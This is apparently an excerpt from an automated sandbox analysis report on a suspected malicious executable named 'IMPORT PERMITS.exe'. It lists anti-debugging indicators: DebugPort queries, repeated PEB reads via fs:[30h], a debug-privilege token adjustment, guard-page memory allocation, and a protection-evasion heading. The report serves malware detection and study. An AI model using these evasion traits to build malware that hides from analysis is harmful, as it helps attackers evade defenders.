                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\PATHPING.EXE Process queried: DebugPort
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_00417513 LdrLoadDll, 2_2_00417513
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Code function: 2_2_01474144 mov eax, dword ptr fs:[00000030h] 2_2_01474144
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov eax, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov eax, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov ecx, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0148E3DB mov eax, dword ptr fs:[00000030h]2_2_0148E3DB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014843D4 mov eax, dword ptr fs:[00000030h]2_2_014843D4
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014843D4 mov eax, dword ptr fs:[00000030h]2_2_014843D4
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8397 mov eax, dword ptr fs:[00000030h]2_2_013D8397
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8397 mov eax, dword ptr fs:[00000030h]2_2_013D8397
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D8397 mov eax, dword ptr fs:[00000030h]2_2_013D8397
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE388 mov eax, dword ptr fs:[00000030h]2_2_013DE388
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE388 mov eax, dword ptr fs:[00000030h]2_2_013DE388
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE388 mov eax, dword ptr fs:[00000030h]2_2_013DE388
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014163FF mov eax, dword ptr fs:[00000030h]2_2_014163FF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F0 mov eax, dword ptr fs:[00000030h]2_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F0 mov eax, dword ptr fs:[00000030h]2_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013FE3F0 mov eax, dword ptr fs:[00000030h]2_2_013FE3F0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140438F mov eax, dword ptr fs:[00000030h]2_2_0140438F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140438F mov eax, dword ptr fs:[00000030h]2_2_0140438F
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F03E9 mov eax, dword ptr fs:[00000030h]2_2_013F03E9
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA3C0 mov eax, dword ptr fs:[00000030h]2_2_013EA3C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E83C0 mov eax, dword ptr fs:[00000030h]2_2_013E83C0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01468243 mov eax, dword ptr fs:[00000030h]2_2_01468243
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01468243 mov ecx, dword ptr fs:[00000030h]2_2_01468243
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D823B mov eax, dword ptr fs:[00000030h]2_2_013D823B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B625D mov eax, dword ptr fs:[00000030h]2_2_014B625D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A250 mov eax, dword ptr fs:[00000030h]2_2_0149A250
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A250 mov eax, dword ptr fs:[00000030h]2_2_0149A250
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01490274 mov eax, dword ptr fs:[00000030h]2_2_01490274
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D826B mov eax, dword ptr fs:[00000030h]2_2_013D826B
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4260 mov eax, dword ptr fs:[00000030h]2_2_013E4260
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4260 mov eax, dword ptr fs:[00000030h]2_2_013E4260
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E4260 mov eax, dword ptr fs:[00000030h]2_2_013E4260
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E6259 mov eax, dword ptr fs:[00000030h]2_2_013E6259
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DA250 mov eax, dword ptr fs:[00000030h]2_2_013DA250
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B62D6 mov eax, dword ptr fs:[00000030h]2_2_014B62D6
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02A0 mov eax, dword ptr fs:[00000030h]2_2_013F02A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02A0 mov eax, dword ptr fs:[00000030h]2_2_013F02A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460283 mov eax, dword ptr fs:[00000030h]2_2_01460283
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460283 mov eax, dword ptr fs:[00000030h]2_2_01460283
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01460283 mov eax, dword ptr fs:[00000030h]2_2_01460283
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E284 mov eax, dword ptr fs:[00000030h]2_2_0141E284
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E284 mov eax, dword ptr fs:[00000030h]2_2_0141E284
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02E1 mov eax, dword ptr fs:[00000030h]2_2_013F02E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02E1 mov eax, dword ptr fs:[00000030h]2_2_013F02E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F02E1 mov eax, dword ptr fs:[00000030h]2_2_013F02E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov ecx, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014762A0 mov eax, dword ptr fs:[00000030h]2_2_014762A0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013EA2C3 mov eax, dword ptr fs:[00000030h]2_2_013EA2C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0535 mov eax, dword ptr fs:[00000030h]2_2_013F0535
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141656A mov eax, dword ptr fs:[00000030h]2_2_0141656A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141656A mov eax, dword ptr fs:[00000030h]2_2_0141656A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141656A mov eax, dword ptr fs:[00000030h]2_2_0141656A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01476500 mov eax, dword ptr fs:[00000030h]2_2_01476500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014B4500 mov eax, dword ptr fs:[00000030h]2_2_014B4500
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8550 mov eax, dword ptr fs:[00000030h]2_2_013E8550
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8550 mov eax, dword ptr fs:[00000030h]2_2_013E8550
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E53E mov eax, dword ptr fs:[00000030h]2_2_0140E53E
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E5CF mov eax, dword ptr fs:[00000030h]2_2_0141E5CF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E5CF mov eax, dword ptr fs:[00000030h]2_2_0141E5CF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A5D0 mov eax, dword ptr fs:[00000030h]2_2_0141A5D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141A5D0 mov eax, dword ptr fs:[00000030h]2_2_0141A5D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140E5E7 mov eax, dword ptr fs:[00000030h]2_2_0140E5E7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C5ED mov eax, dword ptr fs:[00000030h]2_2_0141C5ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C5ED mov eax, dword ptr fs:[00000030h]2_2_0141C5ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E2582 mov eax, dword ptr fs:[00000030h]2_2_013E2582
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E2582 mov ecx, dword ptr fs:[00000030h]2_2_013E2582
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01414588 mov eax, dword ptr fs:[00000030h]2_2_01414588
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E59C mov eax, dword ptr fs:[00000030h]2_2_0141E59C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E25E0 mov eax, dword ptr fs:[00000030h]2_2_013E25E0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014605A7 mov eax, dword ptr fs:[00000030h]2_2_014605A7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014605A7 mov eax, dword ptr fs:[00000030h]2_2_014605A7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014605A7 mov eax, dword ptr fs:[00000030h]2_2_014605A7
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E65D0 mov eax, dword ptr fs:[00000030h]2_2_013E65D0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014045B1 mov eax, dword ptr fs:[00000030h]2_2_014045B1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014045B1 mov eax, dword ptr fs:[00000030h]2_2_014045B1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141E443 mov eax, dword ptr fs:[00000030h]2_2_0141E443
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140245A mov eax, dword ptr fs:[00000030h]2_2_0140245A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DC427 mov eax, dword ptr fs:[00000030h]2_2_013DC427
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE420 mov eax, dword ptr fs:[00000030h]2_2_013DE420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE420 mov eax, dword ptr fs:[00000030h]2_2_013DE420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013DE420 mov eax, dword ptr fs:[00000030h]2_2_013DE420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A456 mov eax, dword ptr fs:[00000030h]2_2_0149A456
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146C460 mov ecx, dword ptr fs:[00000030h]2_2_0146C460
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140A470 mov eax, dword ptr fs:[00000030h]2_2_0140A470
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140A470 mov eax, dword ptr fs:[00000030h]2_2_0140A470
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0140A470 mov eax, dword ptr fs:[00000030h]2_2_0140A470
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418402 mov eax, dword ptr fs:[00000030h]2_2_01418402
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418402 mov eax, dword ptr fs:[00000030h]2_2_01418402
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01418402 mov eax, dword ptr fs:[00000030h]2_2_01418402
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013D645D mov eax, dword ptr fs:[00000030h]2_2_013D645D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01466420 mov eax, dword ptr fs:[00000030h]2_2_01466420
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E64AB mov eax, dword ptr fs:[00000030h]2_2_013E64AB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0149A49A mov eax, dword ptr fs:[00000030h]2_2_0149A49A
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E04E5 mov ecx, dword ptr fs:[00000030h]2_2_013E04E5
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014144B0 mov ecx, dword ptr fs:[00000030h]2_2_014144B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146A4B0 mov eax, dword ptr fs:[00000030h]2_2_0146A4B0
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141674D mov esi, dword ptr fs:[00000030h]2_2_0141674D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141674D mov eax, dword ptr fs:[00000030h]2_2_0141674D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141674D mov eax, dword ptr fs:[00000030h]2_2_0141674D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422750 mov eax, dword ptr fs:[00000030h]2_2_01422750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01422750 mov eax, dword ptr fs:[00000030h]2_2_01422750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01464755 mov eax, dword ptr fs:[00000030h]2_2_01464755
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E75D mov eax, dword ptr fs:[00000030h]2_2_0146E75D
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0710 mov eax, dword ptr fs:[00000030h]2_2_013E0710
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C700 mov eax, dword ptr fs:[00000030h]2_2_0141C700
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E8770 mov eax, dword ptr fs:[00000030h]2_2_013E8770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013F0770 mov eax, dword ptr fs:[00000030h]2_2_013F0770
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_01410710 mov eax, dword ptr fs:[00000030h]2_2_01410710
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C720 mov eax, dword ptr fs:[00000030h]2_2_0141C720
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141C720 mov eax, dword ptr fs:[00000030h]2_2_0141C720
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E0750 mov eax, dword ptr fs:[00000030h]2_2_013E0750
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0145C730 mov eax, dword ptr fs:[00000030h]2_2_0145C730
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141273C mov eax, dword ptr fs:[00000030h]2_2_0141273C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141273C mov ecx, dword ptr fs:[00000030h]2_2_0141273C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0141273C mov eax, dword ptr fs:[00000030h]2_2_0141273C
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014607C3 mov eax, dword ptr fs:[00000030h]2_2_014607C3
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E07AF mov eax, dword ptr fs:[00000030h]2_2_013E07AF
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_0146E7E1 mov eax, dword ptr fs:[00000030h]2_2_0146E7E1
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014027ED mov eax, dword ptr fs:[00000030h]2_2_014027ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014027ED mov eax, dword ptr fs:[00000030h]2_2_014027ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_014027ED mov eax, dword ptr fs:[00000030h]2_2_014027ED
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exeCode function: 2_2_013E47FB mov eax, dword ptr fs:[00000030h]2_2_013E47FB
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\IMPORT PERMITS.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

